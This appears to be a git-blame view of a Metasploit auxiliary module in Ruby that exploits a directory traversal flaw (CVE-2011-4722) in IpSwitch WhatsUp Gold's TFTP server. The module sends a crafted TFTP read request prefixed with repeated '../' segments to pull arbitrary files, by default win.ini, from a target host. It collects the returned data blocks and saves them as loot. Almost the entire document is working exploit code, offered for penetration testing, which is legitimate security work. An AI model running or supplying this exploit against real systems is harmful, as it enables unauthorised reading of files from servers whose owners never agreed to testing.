2011-12-04 00:46:34 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2011-12-04 00:46:34 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Auxiliary
|
2011-12-04 00:46:34 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Auxiliary::Scanner
|
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => "IpSwitch WhatsUp Gold TFTP Directory Traversal",
|
|
|
|
'Description' => %q{
|
|
|
|
This modules exploits a directory traversal vulnerability in IpSwitch WhatsUp
|
|
|
|
Gold's TFTP service.
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
2015-04-03 11:12:23 +00:00
|
|
|
'Prabhu S Angadi', # Initial discovery and poc
|
|
|
|
'sinn3r', # Metasploit module
|
|
|
|
'juan vazquez' # More improvements
|
2013-08-30 21:28:54 +00:00
|
|
|
],
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['OSVDB', '77455'],
|
|
|
|
['BID', '50890'],
|
|
|
|
['EDB', '18189'],
|
2014-11-17 00:42:53 +00:00
|
|
|
['URL', 'http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt'],
|
|
|
|
['CVE', '2011-4722']
|
2013-08-30 21:28:54 +00:00
|
|
|
],
|
|
|
|
'DisclosureDate' => "Dec 12 2011"
|
|
|
|
))
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(69),
|
2014-09-04 22:03:21 +00:00
|
|
|
OptString.new('FILENAME', [false, 'The file to loot', 'windows\\win.ini']),
|
2016-03-06 05:11:39 +00:00
|
|
|
OptBool.new('SAVE', [false, 'Save the downloaded file to disk', false])
|
2013-08-30 21:28:54 +00:00
|
|
|
], self.class)
|
|
|
|
end
|
|
|
|
|
|
|
|
def run_host(ip)
|
|
|
|
# Prepare the filename
|
|
|
|
file_name = "../"*10
|
|
|
|
file_name << datastore['FILENAME']
|
|
|
|
|
|
|
|
# Prepare the packet
|
|
|
|
pkt = "\x00\x01"
|
|
|
|
pkt << file_name
|
|
|
|
pkt << "\x00"
|
|
|
|
pkt << "octet"
|
|
|
|
pkt << "\x00"
|
|
|
|
|
|
|
|
# We need to reuse the same port in order to receive the data
|
|
|
|
udp_sock = Rex::Socket::Udp.create(
|
|
|
|
{
|
|
|
|
'Context' => {'Msf' => framework, 'MsfExploit'=>self}
|
|
|
|
}
|
|
|
|
)
|
|
|
|
|
|
|
|
add_socket(udp_sock)
|
|
|
|
|
|
|
|
# Send the packet to target
|
|
|
|
file_data = ''
|
|
|
|
udp_sock.sendto(pkt, ip, datastore['RPORT'].to_i)
|
|
|
|
|
|
|
|
while (r = udp_sock.recvfrom(65535, 0.1) and r[1])
|
|
|
|
|
|
|
|
opcode, block, data = r[0].unpack("nna*") # Parse reply
|
|
|
|
if opcode != 3 # Check opcode: 3 => Data Packet
|
|
|
|
print_error("Error retrieving file #{file_name} from #{ip}")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
file_data << data
|
|
|
|
udp_sock.sendto(tftp_ack(block), r[1], r[2].to_i, 0) # Ack
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
if file_data.empty?
|
|
|
|
print_error("Error retrieving file #{file_name} from #{ip}")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
udp_sock.close
|
|
|
|
|
|
|
|
# Output file if verbose
|
|
|
|
vprint_line(file_data.to_s)
|
|
|
|
|
|
|
|
# Save file to disk
|
|
|
|
path = store_loot(
|
|
|
|
'whatsupgold.tftp',
|
|
|
|
'application/octet-stream',
|
|
|
|
ip,
|
|
|
|
file_data,
|
|
|
|
datastore['FILENAME']
|
|
|
|
)
|
|
|
|
|
|
|
|
print_status("File saved in: #{path}")
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# Returns an Acknowledgement
|
|
|
|
#
|
|
|
|
def tftp_ack(block=1)
|
|
|
|
|
|
|
|
pkt = "\x00\x04" # Ack
|
|
|
|
pkt << [block].pack("n") # Block Id
|
|
|
|
|
|
|
|
end
|
2011-12-07 18:22:58 +00:00
|
|
|
|
2011-12-04 00:46:34 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
=begin
|
|
|
|
Remote code execution might be unlikely with this directory traversal bug, because WRITE
|
|
|
|
requests are forbidden by default, and cannot be changed.
|
2011-12-04 13:48:48 +00:00
|
|
|
=end
|